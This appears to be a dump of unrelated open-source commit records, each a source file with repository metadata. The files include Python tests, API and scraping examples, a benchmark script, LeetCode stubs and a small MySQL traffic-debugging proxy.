print(u'{}:{}'.format(word, frequency))
return fdist.most_common(words_n)
if __name__ == "__main__":
text = 'Die offene Gesellschaft ist ein in der Tradition des Liberalismus stehendes Gesellschaftsmodell Karl Poppers, das zum Ziel hat, „die kritischen Fähigkeiten des Menschen“ freizusetzen. Die Gewalt des Staates soll dabei so weit wie möglich geteilt werden, um Machtmissbrauch zu verhindern. Poppers Vorstellung von der offenen Gesellschaft ist eng mit der Staatsform der Demokratie verbunden, allerdings nicht verstanden als Herrschaft der Mehrheit, sondern als die Möglichkeit, die Regierung gewaltfrei abzuwählen. Der offenen Gesellschaft steht einerseits die Laissez-Faire-Gesellschaft gegenüber, andererseits die totalitäre, am holistisch-kollektivistischen Denken ausgerichtete „geschlossene Gesellschaft“, die Popper auch ironisch den „Himmel auf Erden“ nennt, weil sie als solcher propagiert wird.'
get_word_frequencies(text)
| mit | Python |
|
1281d0e298d5b68f55e5c290e145ec0255552d7a | add tests | Arvedui/i3pystatus,enkore/i3pystatus,yang-ling/i3pystatus,schroeji/i3pystatus,m45t3r/i3pystatus,teto/i3pystatus,schroeji/i3pystatus,m45t3r/i3pystatus,fmarchenko/i3pystatus,richese/i3pystatus,drwahl/i3pystatus,teto/i3pystatus,richese/i3pystatus,Arvedui/i3pystatus,facetoe/i3pystatus,ncoop/i3pystatus,ncoop/i3pystatus,enkore/i3pystatus,facetoe/i3pystatus,yang-ling/i3pystatus,drwahl/i3pystatus,fmarchenko/i3pystatus | tests/test_backlight.py | tests/test_backlight.py | import i3pystatus.backlight as backlight
import os
import pytest
from contextlib import contextmanager
from operator import itemgetter
from tempfile import TemporaryDirectory
@contextmanager
def setattr_temporarily(obj, attr, value):
old_value = getattr(obj, attr)
setattr(obj, attr, value)
yield
setattr(obj, attr, old_value)
@pytest.mark.parametrize("backlights_data", [
[],
[("acpi_video0", 0, 255)],
[("acpi_video0", 86, 171)],
[("acpi_video0", 255, 255)],
[("intel_backlight", 0, 7)],
[("intel_backlight", 15, 33)],
[("intel_backlight", 79, 255)],
[("acpi_video0", 0, 50), ("intel_backlight", 44, 60)],
[("acpi_video0", 100, 100), ("intel_backlight", 187, 255)],
[("intel_backlight", 87, 88), ("acpi_video0", 150, 150)],
[("intel_backlight", 237, 237), ("acpi_video0", 1, 2)],
])
@pytest.mark.parametrize("format", [
None, "{brightness}/{max_brightness} ({percentage}%)"
])
@pytest.mark.parametrize("format_no_backlight", [
None, "({percentage}% -- {brightness}) [{max_brightness}]"
])
def test_backlight(backlights_data, format, format_no_backlight):
print(backlight.Backlight.base_path)
with TemporaryDirectory() as tmp_dirname:
for (backlight_name, brightness, max_brightness) in backlights_data:
backlight_dirname = tmp_dirname + "/" + backlight_name
os.mkdir(backlight_dirname)
with open(backlight_dirname + "/brightness", "w") as f:
print(brightness, file=f)
with open(backlight_dirname + "/max_brightness", "w") as f:
print(max_brightness, file=f)
if not format:
format = backlight.Backlight.format
if not format_no_backlight:
format_no_backlight = backlight.Backlight.format_no_backlight
if not format_no_backlight:
format_no_backlight = format
with setattr_temporarily(backlight.Backlight, 'base_path', tmp_dirname + "/{backlight}/"):
i3backlight = backlight.Backlight(
format=format,
format_no_backlight=format_no_backlight)
i3backlight.run()
if len(backlights_data) == 0:
used_format = format_no_backlight
cdict = {
"brightness": -1,
"max_brightness": -1,
"percentage": -1
}
else:
backlights_data = sorted(backlights_data, key=itemgetter(0))
(_, brightness, max_brightness) = backlights_data[0]
used_format = format
cdict = {
"brightness": brightness,
"max_brightness": max_brightness,
"percentage": round((brightness / max_brightness) * 100)
}
assert i3backlight.output["full_text"] == used_format.format(**cdict)
| mit | Python |
|
20ecbf00c05d1f959e78cbf87cf459fd46dea59f | Create pythonhelloworld.py | nashme818/commandlinearlington | pythonhelloworld.py | pythonhelloworld.py | print "hello world"
| unlicense | Python |
|
99a63431e441a1c52d3f16f6faf0594497755d45 | add a new special case install_zstack. It only installs zstack and initalize database, but not do any real cloud deployment | zstackorg/zstack-woodpecker,zstackio/zstack-woodpecker,zstackio/zstack-woodpecker,zstackorg/zstack-woodpecker,SoftwareKing/zstack-woodpecker,SoftwareKing/zstack-woodpecker,zstackio/zstack-woodpecker,quarkonics/zstack-woodpecker,zstackorg/zstack-woodpecker,quarkonics/zstack-woodpecker | integrationtest/vm/basic/install_zstack.py | integrationtest/vm/basic/install_zstack.py | '''
@author: Youyk
'''
import os
import zstackwoodpecker.setup_actions as setup_actions
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_util as test_util
USER_PATH = os.path.expanduser('~')
EXTRA_SUITE_SETUP_SCRIPT = '%s/.zstackwoodpecker/extra_suite_setup_config.sh' % USER_PATH
def test():
setup = setup_actions.SetupAction()
setup.plan = test_lib.all_config
setup.run()
if os.path.exists(EXTRA_SUITE_SETUP_SCRIPT):
os.system("bash %s" % EXTRA_SUITE_SETUP_SCRIPT)
test_util.test_pass('ZStack Installation Success')
| apache-2.0 | Python |
|
c6ded12845f25e305789840e1687bfee83e82be5 | Add a few simple pytest tests | zachpanz88/mlbgame,panzarino/mlbgame | tests/test_standings.py | tests/test_standings.py | #!/usr/bin/env python
import pytest
from datetime import datetime
from mlbgame import standings
date = datetime(2017, 5, 15, 19, 4, 59, 367187)
s = standings.Standings(date)
def test_standings_url():
standings_url = 'http://mlb.mlb.com/lookup/json/named.standings_schedule_date.bam?season=2017&' \
'schedule_game_date.game_date=%272017/05/15%27&sit_code=%27h0%27&league_id=103&' \
'league_id=104&all_star_sw=%27N%27&version=2'
assert s.standings_url == standings_url
def test_historical_standings_url():
date = datetime(2016, 5, 15)
s = standings.Standings(date)
standings_url = 'http://mlb.mlb.com/lookup/json/named.historical_standings_schedule_date.bam?season=2016&' \
'game_date=%272016/05/15%27&sit_code=%27h0%27&league_id=103&league_id=104&' \
'all_star_sw=%27N%27&version=48'
assert s.standings_url == standings_url
def test_divisions_is_list():
assert type(s.divisions) is list
| mit | Python |
|
5f5c98df4349fb31f0311b1fb7f0e6b9092b4b59 | add API example | live4thee/zstack-utility,ghxandsky/zstack-utility,mrwangxc/zstack-utility,mrwangxc/zstack-utility,ghxandsky/zstack-utility,zstackorg/zstack-utility,mrwangxc/zstack-utility,mingjian2049/zstack-utility,mingjian2049/zstack-utility,zstackorg/zstack-utility,zstackio/zstack-utility,mingjian2049/zstack-utility,zstackio/zstack-utility,zstackorg/zstack-utility,zstackio/zstack-utility,ghxandsky/zstack-utility,live4thee/zstack-utility,live4thee/zstack-utility | apibinding/examples/example.py | apibinding/examples/example.py | import httplib
import json
import time
# return a dict containing API return value
def api_call(session_uuid, api_id, api_content):
conn = httplib.HTTPConnection("localhost", 8080)
headers = {"Content-Type": "application/json"}
if session_uuid:
api_content["session"] = {"uuid": session_uuid}
api_body = {api_id: api_content}
conn.request("POST", "/zstack/api", json.dumps(api_body))
response = conn.getresponse()
if response.status != 200:
raise Exception("failed to make an API call, %s, %s" % (response.status, response.reason))
rsp_body = response.read()
rsp = json.loads(rsp_body)
if rsp["state"] == "Done":
return json.loads(rsp["result"])
job_uuid = rsp["uuid"]
def query_until_done():
conn.request("GET", "/zstack/api/result/%s" % job_uuid)
response = conn.getresponse()
if response.status != 200:
raise Exception("failed to query API result, %s, %s" % (response.status, response.reason))
rsp_body = response.read()
rsp = json.loads(rsp_body)
if rsp["state"] == "Done":
return json.loads(rsp["result"])
time.sleep(1)
print "Job[uuid:%s] is still in processing" % job_uuid
return query_until_done()
return query_until_done()
def error_if_fail(rsp):
success = rsp.values()[0]["success"]
if not success:
error = rsp.values()[0]["error"]
raise Exception("failed to login, %s" % json.dumps(error))
def login():
content = {
"accountName": "admin",
"password": "b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86"
}
rsp = api_call(None, "org.zstack.header.identity.APILogInByAccountMsg", content)
error_if_fail(rsp)
session_uuid = rsp.values()[0]["inventory"]["uuid"]
print "successfully login, session uuid is: %s" % session_uuid
return session_uuid
def create_zone(session_uuid):
content = {"name": "zone1"}
rsp = api_call(session_uuid, "org.zstack.header.zone.APICreateZoneMsg", content)
error_if_fail(rsp)
print "successfully created zone1"
def logout(session_uuid):
content = {"sessionUuid": session_uuid}
rsp = api_call(None, "org.zstack.header.identity.APILogOutMsg", content)
error_if_fail(rsp)
print "successfully logout"
session_uuid = login()
create_zone(session_uuid)
logout(session_uuid)
| apache-2.0 | Python |
|
01ee5e64093bfd6f6c57c27d189408f2f765f2b4 | Create load_from_numpy.py | guillitte/pytorch-sentiment-neuron | load_from_numpy.py | load_from_numpy.py | import os
import torch
from torch.autograd import Variable
from torch import optim
import torch.nn.functional as F
import torch.nn as nn
import numpy as np
import models
import argparse
import time
import math
parser = argparse.ArgumentParser(description='load_from_numpy.py')
parser.add_argument('-save_model', default='mlstm-ns.pt',
help="""Model filename to save""")
parser.add_argument('-load_model', default='',
help="""Model filename to load""")
parser.add_argument('-train', default='data/input.txt',
help="""Text filename for training""")
parser.add_argument('-valid', default='data/valid.txt',
help="""Text filename for validation""")
parser.add_argument('-rnn_type', default='mlstm',
help='mlstm, lstm or gru')
parser.add_argument('-layers', type=int, default=1,
help='Number of layers in the encoder/decoder')
parser.add_argument('-rnn_size', type=int, default=4096,
help='Size of hidden states')
parser.add_argument('-embed_size', type=int, default=128,
help='Size of embeddings')
parser.add_argument('-seq_length', type=int, default=20,
help="Maximum sequence length")
parser.add_argument('-batch_size', type=int, default=64,
help='Maximum batch size')
parser.add_argument('-learning_rate', type=float, default=0.001,
help="""Starting learning rate.""")
parser.add_argument('-dropout', type=float, default=0.0,
help='Dropout probability.')
parser.add_argument('-param_init', type=float, default=0.05,
help="""Parameters are initialized over uniform distribution
with support (-param_init, param_init)""")
parser.add_argument('-clip', type=float, default=5,
help="""Clip gradients at this value.""")
parser.add_argument('--seed', type=int, default=1234,
help='random seed')
# GPU
parser.add_argument('-cuda', action='store_true',
help="Use CUDA")
opt = parser.parse_args()
embed = nn.Embedding(256, opt.embed_size)
rnn = models.StackedLSTM(models.mLSTM, opt.layers, opt.embed_size, opt.rnn_size, 256, opt.dropout)
embed.weight.data = torch.from_numpy(np.load("weights/embd.npy"))
rnn.h2o.weight.data = torch.from_numpy(np.load("weights/w.npy")).t()
rnn.h2o.bias.data = torch.from_numpy(np.load("weights/b.npy"))
rnn.layers[0].wx.weight.data = torch.from_numpy(np.load("weights/wx.npy")).t()
rnn.layers[0].wh.weight.data = torch.from_numpy(np.load("weights/wh.npy")).t()
rnn.layers[0].wh.bias.data = torch.from_numpy(np.load("weights/b0.npy"))
rnn.layers[0].wmx.weight.data = torch.from_numpy(np.load("weights/wmx.npy")).t()
rnn.layers[0].wmh.weight.data = torch.from_numpy(np.load("weights/wmh.npy")).t()
checkpoint = {
'rnn': rnn,
'embed': embed,
'opt': opt,
'epoch': 0
}
save_file = opt.save_model
print('Saving to '+ save_file)
torch.save(checkpoint, save_file)
| mit | Python |
|
03123c64835f0a1d4cb16cbc638a432b99cc9d04 | Add a test case for #605 - the issue has been fixed by #606 | slackhq/python-slackclient,slackapi/python-slackclient,slackapi/python-slackclient,slackapi/python-slackclient | integration_tests/rtm/test_issue_605.py | integration_tests/rtm/test_issue_605.py | import asyncio
import collections
import logging
import os
import threading
import time
import unittest
import pytest
from integration_tests.env_variable_names import SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN, \
SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID
from slack import RTMClient, WebClient
class TestRTMClient_Issue_605(unittest.TestCase):
"""Runs integration tests with real Slack API
https://github.com/slackapi/python-slackclient/issues/605
"""
def setUp(self):
self.logger = logging.getLogger(__name__)
self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
self.channel_id = os.environ[SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID]
self.rtm_client = RTMClient(token=self.bot_token, run_async=False)
def tearDown(self):
# Reset the decorators by @RTMClient.run_on
RTMClient._callbacks = collections.defaultdict(list)
@pytest.mark.skip()
def test_issue_605(self):
self.text = "This message was sent to verify issue #605"
self.called = False
@RTMClient.run_on(event="message")
def process_messages(**payload):
self.logger.info(payload)
self.called = True
def connect():
self.logger.debug("Starting RTM Client...")
self.rtm_client.start()
t = threading.Thread(target=connect)
t.setDaemon(True)
try:
t.start()
self.assertFalse(self.called)
time.sleep(3)
self.web_client = WebClient(
token=self.bot_token,
run_async=False,
loop=asyncio.new_event_loop(), # TODO: this doesn't work without this
)
new_message = self.web_client.chat_postMessage(channel=self.channel_id, text=self.text)
self.assertFalse("error" in new_message)
time.sleep(5)
self.assertTrue(self.called)
finally:
t.join(.3)
# --- a/slack/rtm/client.py
# +++ b/slack/rtm/client.py
# @@ -10,7 +10,6 @@ import inspect
# import signal
# from typing import Optional, Callable, DefaultDict
# from ssl import SSLContext
# -from threading import current_thread, main_thread
#
# # ThirdParty Imports
# import asyncio
# @@ -186,7 +185,8 @@ class RTMClient(object):
# SlackApiError: Unable to retrieve RTM URL from Slack.
# """
# # TODO: Add Windows support for graceful shutdowns.
# - if os.name != "nt" and current_thread() == main_thread():
# + # if os.name != "nt" and current_thread() == main_thread():
# + if os.name != "nt":
# signals = (signal.SIGHUP, signal.SIGTERM, signal.SIGINT)
# for s in signals:
# self._event_loop.add_signal_handler(s, self.stop)
# Exception in thread Thread-1:
# Traceback (most recent call last):
# File "/path-to-python/asyncio/unix_events.py", line 95, in add_signal_handler
# signal.set_wakeup_fd(self._csock.fileno())
# ValueError: set_wakeup_fd only works in main thread
#
# During handling of the above exception, another exception occurred:
#
# Traceback (most recent call last):
# File "/path-to-python/threading.py", line 932, in _bootstrap_inner
# self.run()
# File "/path-to-python/threading.py", line 870, in run
# self._target(*self._args, **self._kwargs)
# File "/path-to-project/python-slackclient/integration_tests/rtm/test_issue_605.py", line 29, in connect
# self.rtm_client.start()
# File "/path-to-project/python-slackclient/slack/rtm/client.py", line 192, in start
# self._event_loop.add_signal_handler(s, self.stop)
# File "/path-to-python/asyncio/unix_events.py", line 97, in add_signal_handler
# raise RuntimeError(str(exc))
# RuntimeError: set_wakeup_fd only works in main thread | mit | Python |
|
66d3d329674521c8756a8644f2f0a58824a1ec41 | add spider for ups freight | iandees/all-the-places,iandees/all-the-places,iandees/all-the-places | locations/spiders/ups_freight_service_centers.py | locations/spiders/ups_freight_service_centers.py | # -*- coding: utf-8 -*-
import re
import scrapy
from locations.items import GeojsonPointItem
class UPSFreightServiceCenter(scrapy.Spider):
download_delay = 0.2
name = "ups_freight_service_centers"
allowed_domains = ["upsfreight.com"]
start_urls = (
'https://www.upsfreight.com/ProductsandServices/ServiceCenterDir/default.aspx',
)
def parse_location(self, response):
ref = re.search(r'.+/(.+)', response.url).group(1)
properties = {
'addr_full': response.xpath('//span[contains(@id, "Address")]/text()').extract()[0],
'city': response.xpath('//span[contains(@id, "Zip")]/text()').extract()[0].split(',')[0],
'state': response.xpath('//span[contains(@id, "Zip")]/text()').extract()[0].split(', ')[1].split(' ')[0],
'postcode': response.xpath('//span[contains(@id, "Zip")]/text()').extract()[0].split(', ')[1].split(' ')[1],
'ref': ref,
'website': response.url,
'phone': response.xpath('//span[contains(@id, "Telephone")]/text()').extract()[0],
'name': response.xpath('//span[contains(@id, "lName")]/text()').extract()[0],
'country': ref.split('qcountry=')[1].split('&svc')[0]
}
yield GeojsonPointItem(**properties)
def parse_state(self, response):
location_urls = response.xpath('//*[@id="app_ctl00_scTable_hlDetail"]/@href').extract()
for url in location_urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_location)
def parse(self, response):
urls = response.xpath('//table//table//table//table//table//a/@href').extract()
for url in urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_state)
| mit | Python |
|
9311d3d4acd8c67c20d76cc74d00e0f5a83318e6 | add product-of-array-except-self | zeyuanxy/leet-code,EdisonAlgorithms/LeetCode,zeyuanxy/leet-code,zeyuanxy/leet-code,EdisonAlgorithms/LeetCode,EdisonAlgorithms/LeetCode | vol5/product-of-array-except-self/product-of-array-except-self.py | vol5/product-of-array-except-self/product-of-array-except-self.py | class Solution(object):
def productExceptSelf(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
n = len(nums)
ret = [1] * n
product = 1
for i in range(n):
ret[i] = product
product *= nums[i]
product = 1
for i in range(n - 1, -1, -1):
ret[i] *= product
product *= nums[i]
return ret | mit | Python |
|
2c1e5286eca392854bf311e01d1131c45167973f | add coco benchmarking | mehdidc/fluentopt,mehdidc/fluentopt | benchmarks/coco.py | benchmarks/coco.py | """
This benchmark example uses the coco benchmark set of functions
(<http://coco.gforge.inria.fr/>, <https://github.com/numbbo/coco>)
to compare optimizers provided by fluentopt between themselves and also
with CMA-ES[1].
To run these benchmarks, the package 'cocoex' must be installed,
check <https://github.com/numbbo/coco> to see how to install it.
Also, the package 'cma' is needed and can be installed by pip.
For each function, each algorithm is ran for independent trials
and the results are all written in a csv file (by default benchmarks.csv).
each row correspond to a trial for a given algo and function.
The columns are:
- 'func' : function name (str)
- 'algo' : algo name (str)
- 'nbeval' : nb of evaluations performed (int)
- 'ybest' : the best output value found (float)
- 'duration' : duration in seconds (float)
[1] Nikolaus Hansen and Andreas Ostermeier, Completely derandomized
self-adaptation in evolution strategies.
Evolutionary computation, 9(2):159–195, 2001
"""
import time
import numpy as np
import pandas as pd
from cocoex import Suite, Observer
from fluentopt import Bandit
from fluentopt.bandit import ucb_minimize
from fluentopt.transformers import Wrapper
from fluentopt import RandomSearch
from cma import fmin as cma_fmin
from cma import CMAEvolutionStrategy
from clize import run
def cma(fun, budget):
sigma0 = 0.02
range_ = fun.upper_bounds - fun.lower_bounds
center = fun.lower_bounds + range_ / 2
x0 = center
options = dict(
scaling=range_/range_[0],
maxfevals=budget,
verb_log=0,
verb_disp=1,
verbose=1)
es = CMAEvolutionStrategy(x0, sigma0 * range_[0], options)
res = es.optimize(fun).result()
xbest, ybest, nbeval, *rest = res
return xbest, ybest, nbeval
def ucb(fun, budget):
sampler = _uniform_sampler(low=fun.lower_bounds, high=fun.upper_bounds)
opt = Bandit(sampler=sampler, score=ucb_minimize, nb_suggestions=100)
return _run_opt(opt, fun, budget)
def random_search(fun, budget):
sampler = _uniform_sampler(low=fun.lower_bounds, high=fun.upper_bounds)
opt = RandomSearch(sampler=sampler)
return _run_opt(opt, fun, budget)
def _uniform_sampler(low, high):
low = np.array(low)
high = np.array(high)
dim = len(low)
def sampler_(rng):
return rng.uniform(0, 1, size=dim) * (high - low) + low
return sampler_
def _run_opt(opt, feval, budget):
for _ in range(budget):
x = opt.suggest()
y = feval(x)
opt.update(x=x, y=y)
idx = np.argmin(opt.output_history_)
xbest = opt.input_history_[idx]
ybest = opt.output_history_[idx]
nbeval = budget
return xbest, ybest, nbeval
def main(nb_trials=15, budget_per_dim=100, output='benchmark.csv'):
suite_instance = "year:2016"
suite_name = "bbob"
suite_options = ""
suite = Suite(suite_name, suite_instance, suite_options)
algos = [random_search, cma, ucb]
stats = []
for i, fun in enumerate(suite):
print('Function {}'.format(fun.name))
for algo in algos:
algo_name = algo.__name__
print('Algo : "{}"'.format(algo_name))
for trial in range(nb_trials):
print('Running trial {}...'.format(trial + 1))
t0 = time.time()
xbest, ybest, nbeval = algo(fun, budget_per_dim * fun.dimension)
delta_t = time.time() - t0
stats.append({
'func': fun.id,
'algo': algo_name,
'nbeval': nbeval,
'ybest': ybest,
'duration': delta_t
})
stats = pd.DataFrame(stats)
stats.to_csv(output, index=False)
if __name__ == '__main__':
run(main)
| bsd-3-clause | Python |
|
6ae6544cca07e857d680d199b2c2f436cb1d9a82 | add wordpress stats | JulienLeonard/socialstats | wordpress_stats.py | wordpress_stats.py | from utils import *
import urllib, json
import time
import datetime
def dump(blogid,filepath):
posts = []
offset = 0
while True:
puts("offset",offset)
url = "https://public-api.wordpress.com/rest/v1/sites/" + blogid + "/posts?number=100&offset=" + str(offset)
response = urllib.urlopen(url);
data = json.loads(response.read())
for post in data['posts']:
posts.append(post)
if len(data['posts']) < 100:
break
offset += 100
output=open(filepath, 'w+')
content = "<wordpress nfollowers=\"" + "NA" + "\" timestamp=\"" + str(time.time()) + "\">\n"
for post in posts:
puts(post['title'],post['like_count'],post['date'])
content = content + "\t<post name=\"" + post['title'] + "\" \t timestamp=\"" + str(post['date']) + "\" \t fav_count=\"" + str(post['like_count']) + "\"></post>\n"
content = content + "</wordpress>\n"
output.write(content.encode('utf8'))
output.close()
# dump("wordpressexample.xml")
| mit | Python |
|
9cc09c6143025d88eedfa4f8eedcd23e2fe7990e | Create sahilprakash.py | WebClub-NITK/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17 | Python/sahilprakash.py | Python/sahilprakash.py | print("Hello World!")
| mit | Python |
|
9cc13ca511987584ea4f52cf0c2e57e6b98a9e8b | Add lc0350_intersection_of_two_arrays_ii.py | bowen0701/algorithms_data_structures | lc0350_intersection_of_two_arrays_ii.py | lc0350_intersection_of_two_arrays_ii.py | """Leetcode 350. Intersection of Two Arrays II
Easy
URL: https://leetcode.com/problems/intersection-of-two-arrays-ii/
Given two arrays, write a function to compute their intersection.
Example 1:
Input: nums1 = [1,2,2,1], nums2 = [2,2]
Output: [2,2]
Example 2:
Input: nums1 = [4,9,5], nums2 = [9,4,9,8,4]
Output: [4,9]
Note:
- Each element in the result should appear as many times as it shows in both arrays.
- The result can be in any order.
Follow up:
- What if the given array is already sorted? How would you optimize your algorithm?
- What if nums1's size is small compared to nums2's size? Which algorithm is better?
- What if elements of nums2 are stored on disk, and the memory is limited such that
you cannot load all elements into the memory at once?
"""
class Solution(object):
def intersect(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: List[int]
"""
pass
def main():
pass
if __name__ == '__main__':
main()
| bsd-2-clause | Python |
|
eb3882051241843716ef9b7ceef8aeb6ee2a35c6 | add mysqlproxy.py | nakagami/CyMySQL | misc/mysqlproxy.py | misc/mysqlproxy.py | #!/usr/bin/env python3
##############################################################################
#The MIT License (MIT)
#
#Copyright (c) 2016 Hajime Nakagami
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
##############################################################################
import sys
import socket
import binascii
def recv_mysql_packet(sock):
head = sock.recv(4)
n = int.from_bytes(head[:3], byteorder='little')
recieved = b''
while n:
bs = sock.recv(n)
recieved += bs
n -= len(bs)
return head + recieved
def asc_dump(s):
r = ''
for c in s:
r += chr(c) if (c >= 32 and c < 128) else '.'
if r:
print('[' + r + ']')
def proxy_wire(server_name, server_port, listen_host, listen_port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((listen_host, listen_port))
sock.listen(1)
client_sock, addr = sock.accept()
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.connect((server_name, server_port))
while True:
client_data = recv_mysql_packet(client_sock)
server_sock.send(client_data)
print('>>', binascii.b2a_hex(client_data).decode('ascii'))
asc_dump(client_data)
server_data = recv_mysql_packet(server_sock)
client_sock.send(server_data)
print('<<', binascii.b2a_hex(server_data).decode('ascii'))
asc_dump(server_data)
if __name__ == '__main__':
if len(sys.argv) < 3:
print('Usage : ' + sys.argv[0] + ' server[:port] [listen_host:]listen_port')
sys.exit()
server = sys.argv[1].split(':')
server_name = server[0]
if len(server) == 1:
server_port = 3306
else:
server_port = int(server[1])
listen = sys.argv[2].split(':')
if len(listen) == 1:
listen_host = 'localhost'
listen_port = int(listen[0])
else:
listen_host = listen[0]
listen_port = int(listen[1])
proxy_wire(server_name, server_port, listen_host, listen_port)
| mit | Python |
|
f1c389a0028c6f92300573bef587c084204e858f | Create circlecli.py | TheRealJoeLinux/circlecli,TheRealJoeLinux/circlecli | mocks/circlecli.py | mocks/circlecli.py | # -*- coding: utf-8 -*-
"""
Mocks for the CircleCLI API library tests.
"""
from httmock import response, urlmatch
NETLOC = r'(.*\.)?circleci\.com$'
HEADERS = {'content-type': 'application/json'}
GET = 'get'
class Resource:
""" A CircleCli resource.
:param path: The file path to the resource.
"""
def __init__(self, path):
self.path = path
def get(self):
""" Perform a GET request on the resource.
:rtype: str
"""
with open(self.path, 'r') as f:
content = f.read()
return content
@urlmatch(netloc=NETLOC, method=GET)
def resource_get(url, request):
file_path = url.netloc + url.path
try:
content = Resource(file_path).get()
except EnvironmentError:
# catch any environment errors (i.e. file does not exist) and return a
# 404.
return response(404, {}, HEADERS, None, 5, request)
return response(200, content, HEADERS, None, 5, request)
| mit | Python |
|
30359b6e9ec105b2938cedd59127e5fa40964396 | Create setrun.py | mandli/surge-examples | rect-shelf/setrun.py | rect-shelf/setrun.py | mit | Python |
||
39d2a5eec167e659cd30f5522a9e4e9ca11a620a | Create layoutUVPlus.py | aaronfang/personal_scripts | af_scripts/uv/layoutUVPlus.py | af_scripts/uv/layoutUVPlus.py | import pymel.core as pm
import math
sels = pm.ls(sl=1)
gap = 0.003
for i, x in enumerate(sels):
x=x.getShape()
pm.select('{0}.map[:]'.format(x), r=1)
buv = pm.polyEvaluate(x,b2=1)
w = abs(buv[0][1] - buv[0][0])
if i==0:
pm.polyEditUV(u=-buv[0][0]+(gap*(i+1)),v=-buv[1][0]+gap)
else:
pm.polyEditUV(u=-buv[0][0]+(w*i+gap*(i+1)),v=-buv[1][0]+gap)
pm.select(sels,r=1)
| mit | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.